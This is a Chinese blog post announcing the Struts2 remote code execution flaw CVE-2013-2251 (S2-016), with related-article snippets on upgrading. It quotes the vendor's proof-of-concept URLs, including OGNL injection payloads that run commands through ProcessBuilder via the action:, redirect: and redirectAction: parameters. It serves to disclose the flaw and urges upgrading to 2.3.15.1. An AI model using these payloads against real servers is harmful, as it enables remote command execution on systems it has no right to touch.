Struts 2.0.0 - Struts 2.3.15漏洞来袭

最新推荐文章于 2022-08-22 18:49:16 发布
置顶 最新推荐文章于 2022-08-22 18:49:16 发布
阅读量1.5w 收藏
点赞数 3
分类专栏: WEB框架漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ssergsw/article/details/9362587
版权

Struts官网又公布了一个涉及Struts 2.0.0 - Struts 2.3.15的漏洞,CVE-2013-2251,并给出了漏洞测试的方法:


简单表达式: - the parameter names are evaluated as OGNL.
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
命令执行:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


详情页面:http://struts.apache.org/release/2.3.x/docs/s2-016.html

此漏洞一出,昨天(2013年7月17日)乌云漏洞平台上提交Struts2相关漏洞的数量剧增:


由于国内使用Struts2的网站太多,连一些大站也中招,比如淘宝、腾讯、网易等,官网给出的解决方案为:强烈建议升级到 Struts 2.3.15.1!


ssergsw
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Struts2高危漏洞2.3.15.3
03-15
Struts2高危漏洞造成大规模的信息泄露,因此需对Struts2相关jar包升级。以下是将struts2相关包由低版本升级至2.3.15.3的步骤。
Struts2漏洞修复到2.3.15.1版本步骤
热门推荐
spyjava的专栏
10-31 1万+
近日在CSND头条中爆出Struts2高危漏洞造成大规模的信息泄露的消息,让我们这些从事javaweb软件开发,并且应用struts2的人惊出一身冷汗。Struts漏洞影响巨大,受影响站点以电商、银行、门户、政府居多。而且一些自动化、傻瓜化的利用工具开始出现,填入地址可直接执行服务器命令,读取数据甚至直接关机等操作... 我们的很多项目都是基于Struts2的,这也让我们必须对此做出及时正确
传统框架struts:S2-045漏洞如何彻底解决(struts2.3.15升级到2.3.32 )
follow大师兄的博客
06-25 1148
S2-045:Struts 2远程执行代码漏洞 漏洞描述:Apache Struts 2是世界上最流行的Java Web服务器框架之一。然而在Struts 2上发现存在高危安全漏洞(CVE-2017-5638,S02-45),该漏洞影响到:Struts 2.3.5 - Struts 2.3.31,Struts 2.5 - Struts 2.5.10漏洞影响:基于Jakarta Multipart解析器执行文件上传时可能的RCE影响版本:Struts 2.3.5 - Struts 2.3.31Struts
2017年Struts漏洞修复:版本从2.3.15.1升级到2.3.32
jsczxy2
03-24 966
如果你当前的项目使用了Struts2.3.5至 Struts 2.3.31版本,那么请升级至2.3.32 具体替换6个jar包即可: xwork-core-2.3.32.jar ; struts2-json-plugin-2.3.32.jar; struts2-convention-plugin-2.3.32.jar ; struts2-core-2.3.32; ognl-3.0....
struts2-core-2.3.15.1遇到两个漏洞升级最新版【Struts 2.5.26】
JEFFYU328的专栏
04-20 1386
一、背景 一个老网站Struts2版本struts2-core-2.3.15.1,遇到两个漏洞。 ①被查到存在编号【Struts2 S2-045 远程命令执行漏洞,CVE编号CVE-2017-5638】;受影响版本:【Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.1】。 ②升级版本过程中查询到存在另一个漏洞。计划升级到相近版本2.3.37。但在查询网上帮助时,发现有另一个漏洞;【Struts2 S2-061 远程代码执行漏洞(CVE-202.
spark-2.0.0-bin-hadoop2.6.tgz
11-13
本资源是spark-2.0.0-bin-hadoop2.6.tgz百度网盘资源下载,本资源是spark-2.0.0-bin-hadoop2.6.tgz百度网盘资源下载
struts2-core.jar
08-03
struts2-core-2.0.1.jar, struts2-core-2.0.11.1.jar, struts2-core-2.0.11.2.jar, struts2-core-2.0.11.jar, struts2-core-2.0.12.jar, struts2-core-2.0.14.jar, struts2-core-2.0.5.jar, struts2-core-2.0.6.jar,...
bazel-2.0.0-installer-linux-x86_64.sh
04-24
linux下bazel2.0.0,适合tensorflow-master编译。解决在github上该文件难以下载的问题。
beangle-struts2-2.0.0-sources.jar
03-15
官方版本,亲测可用
triton-2.0.0-cp310-cp310-win_amd64.whl
最新发布
12-15
triton-2.0.0-cp310-cp310-win_amd64.whl
2.3.15.1 版本以前 struts2漏洞利用工具 和升级到2.3.15.1版本
05-11
2.3.15.1 版本以前 struts2漏洞利用工具 和升级到2.3.15.1版本
struts2.0漏洞补丁
10-28
免费资源 ==================== struts2漏洞解决办法 commons-lang3-3.1.jar (保留commons-lang-2.6.jar) javassist-3.11.0.GA.jar (新加包) ognl-3.0.5.jar (替换旧版本) struts2-core-2.3.4.1.jar (替换旧版本) xwork-core-2.3.4.1.jar (替换旧版本)
Struts2最新漏洞升级2.3.32版本
03-22
1、升级所需要的jar(见附件): freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar 2、删除上面原有的低版本jar 3、修改 WEB-INF\classes 目录下struts.xml 文件,加上: 这两行请不要加在外边。“加在这里”
struts2漏洞攻击一例
sam.ds.chen
07-20 227
怎样利用Struts2的漏洞(2.0.0<=version<=2.3.15)搞垮一个基于Struts2写的网站?Struts是java web frameworks里面的鼻祖了,现在大量的web apps里面,从政府网站到金融系统,都有她的影子(大量的系统都是采用一种被用烂了的SSH(Struts+Spring+Hibernate)组合来做的)。甚至阿里/淘宝也有一些系统使用了St...
解决Struts2远程执行漏洞
qq_33571718的博客
08-26 207
环境Struts2 2.3.15 参考:http://blog.sina.com.cn/s/blog_6151984a0101k7oz.html 下载Jar包集合:https://download.csdn.net/download/qq_33571718/11615786
Struts2高位漏洞升级到struts2.3.32
淡墨银痕的博客
04-07 2398
Struts2高位漏洞升级到struts2.3.323月7日带来了一个高危漏洞Struts2漏洞——CVE编号CVE-2017-5638。其原因是由于Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。 升级jar包 更新这些jar包
struts2远程代码执行漏洞合集
黑白的博客
12-21 4224
声明 好好学习,天天向上 S2-001 漏洞描述 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响范围 Struts 2.0.0 - Struts 2.0.8 复现过程 使用vulhub cd /app/vulhub-m
Struts2漏洞分析与复现合集
未完成的歌~的博客
08-22 6193
原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。 漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/struts2/s2-001 运行以下命令进行设置 .............
Could not download transform-api-2.0.0-deprecated-use-gradle-api.jar (com.android.tools.build:transform-api:2.0.0-deprecated-use-gradle-api)
05-23
4. 如果以上方法都无法解决问题,尝试在项目的 build.gradle 文件中手动添加依赖 com.android.tools.build:transform-api:2.0.0-deprecated-use-gradle-api。 希望以上方法能够帮助你解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值